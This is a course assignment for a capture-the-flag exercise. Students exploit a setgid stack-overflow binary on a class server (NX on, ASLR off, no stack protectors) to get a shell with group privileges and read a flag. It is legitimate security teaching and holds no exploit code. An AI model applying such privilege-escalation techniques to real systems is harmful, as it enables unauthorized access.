The goals of this assignment are to:
- Analyze the source code of a vulnerable program
- Exploit the program to capture a secret flag
This assignment is hosted on the class challenge server. You will first need to request an account on the server by emailing an SSH public key to the professor. You will then receive information on accessing the server.
The server is provisioned with a basic set of tools, including
pwntools and a system-wide pwndbg installation in
/opt/pwndbg that can be enabled by default by adding
source /opt/pwndbg/gdbinit.py to your
$HOME/.gdbinit file. If there are other tools you would
like installed system-wide, email the professor.
A variant of the stack overflow program analyzed in class is located
[root@svs ~]# ll /home/chall01/
-rwxr-sr-x. 1 root chall01 29952 Jan 23 18:12 chall01
-rw-r--r--. 1 root root 602 Jan 23 18:12 chall01.cpp
-r--r-----. 1 root chall01 34 Jan 22 21:56 flag
This program has NX enabled, but ASLR is disabled and it has not been compiled with stack protectors.
Use the techniques presented in class to execute a shell with the
group privileges of
chall01. With that shell, capture the
contents of the flag.
Package your solution as a gzipped TAR archive. Include the source code for your attack as well as a README describing your solution, how to run it, and the contents of the flag.